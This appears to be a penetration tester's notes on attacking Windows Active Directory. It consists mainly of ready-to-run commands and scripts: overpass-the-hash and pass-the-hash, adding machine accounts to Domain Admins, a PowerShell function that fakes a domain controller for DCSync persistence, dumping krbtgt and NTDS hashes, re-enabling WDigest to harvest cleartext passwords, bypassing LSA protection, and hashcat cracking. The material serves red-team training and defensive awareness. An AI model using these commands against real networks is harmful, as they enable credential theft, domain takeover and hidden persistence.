- blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash
Use the user or computer NTLM hash to request Kerberos tickets.
--> Alternative to Pass The hash over NTLM protocol
--> Useful in networks where NTLM protocol is disabled and only Kerberos is allowed.
getTGT.py domain.local/workstation1$ -hashes XXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXX -dc-ip 192.168.0.10 -debug
KRB5CCNAME=/home/test/lutzenfried/tooling/workstation1\$.ccache
Potential error when using Over Pass The Hash attack due to the Kerberos and time.
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
--> Error raised because of your local time, you need to synchronise the host with the DC: ntpdate <IP of DC>
- https://adsecurity.org/?p=2011
- https://pentestlab.blog/2022/01/17/domain-persistence-machine-account/
- https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
- https://posts.specterops.io/a-case-study-in-wagging-the-dog-computer-takeover-2bcb7f94c783
- https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
Check for system trusted for delegation
crackmapexec ldap 192.168.0.10 -u jdoe -p Password123 --trusted-for-delegation
OR
ldapdomaindump -u "company.local\\jdoe" -p "Password123" 192.168.0.10
grep TRUSTED_FOR_DELEGATION domain_computers.grep
OR
PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
- MSOL account
- AzureAD Connect
- https://harmj0y.medium.com/a-guide-to-attacking-domain-trusts-ef5f8992bb9d
- https://dirkjanm.io/active-directory-forest-trusts-part-one-how-does-sid-filtering-work/
- https://dirkjanm.io/active-directory-forest-trusts-part-two-trust-transitivity/
- https://improsec.com/tech-blog/o83i79jgzk65bbwn1fwib1ela0rl2d
- https://adsecurity.org/?p=1640
- https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731335(v=ws.11)?redirectedfrom=MSDN
smbclient authentication using NTLM hash
smbclient //192.168.0.10/C$ -U corp.company.com/jdoe --pw-nt-hash <NT hash>
The primary group id is a a user object attribute and contains relative identifier (RID) for the primary group of the user.
--> By default this is the RID for the Domain Users group (RID 513).
By using the Primary Group ID attribute and a specific Access Control Entry (ACE), an attacker can hide the membership of one group that he is already a member of without having any permissions on the group.
This cool trick cannot work on members of protected groups such as Domain Admins, but can work on members of normal groups such as DnsAdmins, which can be used to escalate to Domain Admins.
- https://www.semperis.com/blog/how-attackers-can-use-primary-group-membership-for-defense-evasion/
- https://blog.alsid.eu/primary-group-id-attack-a50dca142771
https://adsecurity.org/?p=3466
Machine accounts could be used as a backdoor for domain persistence by adding them to high privilege groups.
net group "Domain Admins" newMachine01$ /add /domain
python3 secretsdump.py company.local/newMachine01\$:Password123@10.0.0.1 -just-dc-user krbtgt
- https://stealthbits.com/blog/server-untrust-account/
- https://github.com/STEALTHbits/ServerUntrustAccount
- https://pentestlab.blog/2022/01/17/domain-persistence-machine-account/
Even though that dumping passwords hashes via the DCSync technique is not new and SOC teams might have proper alerting in place, using a computer account to perform the same technique might be a more stealthier approach.
Modification of the “userAccountControl” attribute can transform a computer account to a domain controller.
Computer account to appear as a domain controller:
- userAccountControl attribute needs to have the value of 0x2000 = ( SERVER_TRUST_ACCOUNT ) decimal : 8192 --> Modification of this attribute requires domain administrator level privileges
Import-Module .\Powermad.psm1
New-MachineAccount -MachineAccount newMachine01 -Domain company.local -DomainController dc01.company.local
By default new computer will have primary group ID 515 (RID for domain groups and represents that this is a domain computer)
If you can modify the userAccountControl an therefore change the primary group ID. This attribute would be modified to have a value of 8192 the primary group id will change to 516 which belongs to domain controllers.
Set-ADComputer newMachine01 -replace @{ "userAccountcontrol" = 8192 }
Most important bit of having a computer account to act as a domain controller is that the DCSync can be used on that arbitrary account instead of the legitimate domain controller.
Steps:
- Creation a machine account
- Modifying userAccountControl to 8192
- Computer account is known its NTLM hash could be used to pass the hash (create new cmd.exe, mimikatz...)
- Command prompt will open under the context of the machine account --> DCSync KRBTG or whole identities
lsadump::dcsync /domain:purple.lab /user:krbtgt
Automate technique 1:
Add-ServerUntrustAccount -ComputerName "newMachine01" -Password "Password123" -Verbose
Invoke-ServerUntrustAccount -ComputerName "newMachine01" -Password "Password123" -MimikatzPath ".\mimikatz.exe"
Automate technique 2: PowerShell script to automate domain persistence via the userAccountControl active directory attribute.
function Execute-userAccountControl
{
[CmdletBinding()]
param
(
[System.String]$DomainFQDN = $ENV:USERDNSDOMAIN,
[System.String]$ComputerName = 'Pentestlab',
[System.String]$OSVersion = '10.0 (18363)',
[System.String]$OS = 'Windows 10 Enterprise',
[System.String]$DNSName = "$ComputerName.$DomainFQDN",
$MachineAccount = 'Pentestlab'
)
$secureString = convertto-securestring "Password123" -asplaintext -force
$VerbosePreference = "Continue"
Write-Verbose -Message "Creating Computer Account: $ComputerName"
New-ADComputer $ComputerName -AccountPassword $securestring -Enabled $true -OperatingSystem $OS -OperatingSystemVersion $OS_Version -DNSHostName
$DNSName -ErrorAction Stop;
Write-Verbose -Message "$ComputerName created!"
Write-Verbose -Message "Attempting to establish persistence."
Write-Verbose -Message "Changing the userAccountControl attribute of $MachineAccount computer to 8192."
Set-ADComputer $MachineAccount -replace @{ "userAccountcontrol" = 8192 };
Write-Verbose -Message "$MachineAccount is now a Domain Controller!"
Write-Verbose -Message "Domain persistence established!You can now use the DCSync technique with Pentestlab credentials."
$VerbosePreference = "Continue"
}
For example, if an admin server is joined to a group with backup rights on Domain Controllers, all an attacker needs to do is compromise an admin account with rights to that admin server and then get System rights on that admin server to compromise the domain.
- Compromise an account with admin rights to admin server.
- Admin server computer account needs rights to Domain Controllers.
- https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/
- https://www.puckiestyle.nl/extracting-password-hashes-from-the-ntds-dit-file/
- https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/
- https://www.cyberis.com/article/obtaining-ntdsdit-using-built-windows-commands
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/
- https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-domain-controller-hashes-via-wmic-and-shadow-copy-using-vssadmin
- https://www.hackingarticles.in/credential-dumping-ntds-dit/
- https://stealthbits.com/attacks/ntdsdit-password-extraction/
- https://www.ultimatewindowssecurity.com/blog/default.aspx?d=10/2017
Sometimes when using secretsdump.py to extract NTDS.dit you will encounter some CLEARTEXT credential wihtin the dump.
Cleartext does not really mean that the passwords are stored as is. They are stored in an encrypted form using RC4 encryption.
The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin.This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”.
List users with "Store passwords using reversible encryption" enabled
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
--> list of user account control flag :
- https://docs.microsoft.com/en-us/windows/win32/adschema/a-useraccountcontrol
- http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm
- Primer on DCSync attack
- ADSecurity - Mimikatz DCSync Usage, Exploitation, and Detection
- Ired Team - Dump Password From DC with DCSync
- Synacktiv - Dive Into MDI - DCsync detection bypass
lsassy -d company.local -u jdoe -p Pass1234 192.168.1.0/24
Wdigest was introduced in WinXP and designed to be used with HTTP protocol for authentication.
Enabled by default in multiple versions of Windows:
- Windows XP
- Windows 8.0
- Server 2003
- Server 2008
- Server 2012
--> With WDigest plain text passwords are stored in LSASS.
Retrieving using Mimikatz
sekurlsa::wdigest
Can be deactivated/activated setting to 1 the value of UseLogonCredential and Negotiate in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest.
--> If these registry keys don't exist or the value is "0", then WDigest will be deactivated.
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v Negotiate
As an attacker you can reactivate WDigest to get cleartext credentials on sensitive systems.
crackmapexec smb 192.168.0.10 -u jdoe -p Pass123 -M wdigest -o ACTION=enable
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
Since Windows 8.1 you can protect LSA storage using Protected Process (RunAsPPL).
--> This will prevent regular mimikatz.exe sekurlsa:logonpasswords
for working properly.
With this registry key enable, the following 3 actions (which require an handle on LSASS ) will no longer be possible:
sekurlsa:logonpasswords
lsadump::lsa: Did not work
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlmhash>
With this registry key enable, the following 5 actions will still be possible:
lsadump::dcsync /domain:<domain> /user:<user>
lsadump::secrets (get syskey information to decrypt secrets from the registry on disk)
lsadump::sam (Reading credentials from the SAM on disk)
kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt hash> /endin:<value> /renewmax:<value>
keystroke logging
Validate RunAsPPL is enable
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
Documentation about LSA secrets: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
--> Mimikatz has the mimidrv.sys driver that can bypass LSA Protection. Pretty much flag everywhere you will need to write you own driver.
- https://posts.specterops.io/mimidrv-in-depth-4d273d19e148
--> You can also build your own driver and sign it digitally
--> You can also load an official and vulnerable driver that can be exploited to run arbitrary code in the Kernel
- https://github.com/fengjixuchui/gdrv-loader
- https://github.com/RedCursorSecurityConsulting/PPLKiller
- https://gorkemkaradeniz.medium.com/defeating-runasppl-utilizing-vulnerable-drivers-to-read-lsass-with-mimikatz-28f4b50b1de5
--> Use other process (e.g Antivirus process) which sometimes have already handles on LSASS process
- https://skelsec.medium.com/duping-av-with-handles-537ef985eb03
- https://github.com/helpsystems/nanodump
- https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html
LM hash is an old deprecated method of storing passwords which has the following weaknesses:
- Password length is limited to 14 characters
- Passwords that are longer than 7 characters are split into two and each half is hashed separately
- All lower-case characters are converted to upper-case before hashing
grep -iv ':aad3b435b51404eeaad3b435b51404ee:' ntds.dit
sort -t ';' -k 8 domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3, $8}'
Once the dumping is done (ldapdomaindump), get the list of users with AdminCount attribute set to 1 by parsing the ‘domain_users.json’ file:
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json > privileged_users.txt
Then iterate through the list of privileged users, display their last password reset date (pwdLastSet) and sort it:
while read user; do grep ";${user};" domain_users.grep; done < privileged_users.txt | \
grep -v ACCOUNT_DISABLED | sort -t ';' -k 10 | awk -F ';' '{print $3, $10}'
grep DONT_EXPIRE_PASSWD domain_users.grep | grep -v ACCOUNT_DISABLED
net group "Schema Admins" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json
Data exfiltration and DLP (Data Loss Prevention) bypass.
ssh2john.py id_rsa > ssh-hash.txt
john ssh-hash.txt --wordlist=/usr/share/wordlists/rockyou_2021.txt
hashcat -m 3000 -a 0 lm_hashes.txt ../../wordlists/rockyou_2021.txt
Hashcat mask attack
hashcat -m 1000 -a 3 ntds.dit.ntds ?u?l?l?l?l?d?d?d?d?s
Hashcat rule based cracking
hashcat -m 1000 -a 0 --username ntds.dit.ntds ../../wordlists/rockyou_2021.txt -r ../../wordlists/OneRuleToRuleThemAll.rule
Hashcat wordlist cracking
hashcat -m 1000 -a 0 --username ntds.dit.ntds ../../wordlists/rockyou_2021.txt
hashcat -m 5500 -a 0 ntlmv1_hashes.txt ../../wordlists/rockyou_2021.txt
hashcat -m 5600 -a 0 ntlmv2_hashes.txt ../../wordlists/rockyou_2021.txt
hashcat -m 18200 -a 0 AS_REP_responses_hashes.txt ../../wordlists/rockyou_2021.txt
hashcat -m 13100 -a 0 TGS_hashes.txt ../../wordlists/rockyou_2021.txt
hashcat -m 19600 -a 0 TGS_hashes.txt ../../wordlists/rockyou_2021.txt
hashcat -m 19700 -a 0 TGS_hashes.txt ../../wordlists/rockyou_2021.txt
Slow to be cracked due to PBKDF2 usage (PBKDF2(HMAC-SHA1, 10240, DCC1, username)
- https://security.stackexchange.com/questions/30889/cracking-ms-cache-v2-hashes-using-gpu
- https://webstersprodigy.net/2014/02/03/mscash-hash-primer-for-pentesters/
hashcat -m 2100 -a 0 DCC2_hashes.txt ../../wordlists/rockyou_2021.txt
- https://www.blackhillsinfosec.com/plumhound-reporting-engine-for-bloodhoundad/
- https://github.com/plumhound
dpat.py -n ntds.dit -c hashcat.potfile -g "Domain Admins.txt" "Enterprise Admins.txt"
- https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx
- https://labs.withsecure.com/publications/undisable
Rules: Are defined and control execution of the followings items:
- Applications
- Scripts
- Packaged Applications
- Installers
- DLL
Conditions: Are based on the followings filters:
- Publisher (Ex: Software signed by valid vendor)
- Path
- File hash
--> Finally : Allow and Deny actions can be assigned to specific user/group.
- https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
- https://hideandsec.sh/books/cheatsheets-82c/page/active-directory-python-edition
- https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
- https://www.sstic.org/media/SSTIC2014/SSTIC-actes/secrets_dauthentification_pisode_ii__kerberos_cont/SSTIC2014-Article-secrets_dauthentification_pisode_ii__kerberos_contre-attaque-bordes_2.pdf
- https://adsecurity.org/?p=4056
- https://adsecurity.org/?p=1667
- https://harmj0y.medium.com/s4u2pwnage-36efe1a2777c
- https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
- https://posts.specterops.io/a-case-study-in-wagging-the-dog-computer-takeover-2bcb7f94c783
- https://decoder.cloud/2017/11/02/we-dont-need-powershell-exe/
- https://www.ired.team/offensive-security/code-execution/powershell-without-powershell
- https://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628
- https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
- https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/
- https://www.optiv.com/explore-optiv-insights/blog/unmanaged-powershell-binaries-and-endpoint-protection
- https://github.com/leechristensen/UnmanagedPowerShell
Tools:
- https://h4ms1k.github.io/Red_Team_Active_Directory/#
- https://anishmi123.gitbooks.io/oscp-my-journey/content/active-directory/ad-attacks.html
- https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
- https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/amp/
- https://github.com/threatexpress/red-team-scripts
- https://www.thehacker.recipes/ad/recon
- https://www.praetorian.com/blog/red-team-local-privilege-escalation-writable-system-path-privilege-escalation-part-1/
- https://www.praetorian.com/blog/red-team-privilege-escalation-rbcd-based-privilege-escalation-part-2/
- https://www.praetorian.com/blog/how-to-exploit-active-directory-acl-attack-paths-through-ldap-relaying-attacks/
- https://github.com/tevora-threat/SharpView
- https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/
- Delegation
- Printnightmare
- Proxylogon,proxyshell,notproxyshell https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
- Trust, forest
- checker for internal OWA, Exchange vuln
- Exchange vuln privexchange.py
- PAC
- Skeleton key
- Sam Account Name spoofing
- LAPS and LAPS bypass https://www.praetorian.com/blog/obtaining-laps-passwords-through-ldap-relaying-attacks/
- script to enum domain group, protected user unauthenticated (bash + python projects)
- https://pentestbook.six2dez.com/post-exploitation/windows/ad
- ldap signing
- Spooler
- petitpotam https://pentestlab.blog/2021/09/14/petitpotam-ntlm-relay-to-ad-cs/ https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory https://www.ravenswoodtechnology.com/protect-your-windows-network-from-the-petitpotam-exploit/
- ADCS https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/ad-cs-abuse#domain-escalation-via-certificates https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate https://github.com/ly4k/Certipy
- adsecurity all
- Wdigest
- windows authentication cache (HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\CachedLogonsCount)
- LSASS
- DPAPI
- xfreerdp tool
- Service accounts with interactive logon
- Permissive Active Directory Domain Services https://blog.netspi.com/exploiting-adidns/
- DHCP spoofing
- ARP spoofing
- Pypykatz
- Spraykatz
- VLAN hopping
- SNMP default
- Potato family : https://hideandsec.sh/books/windows-sNL/page/in-the-potato-family-i-want-them-all
- SMTP
- ACL/DACL exploitation
- Owner https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#owns
- Hekatomb tool (https://github.com/Processus-Thief/HEKATOMB)
LAPS, JEA, WSL, RBCD, WDAC, ASR, AWL, Credential Guard, CLM, virtualization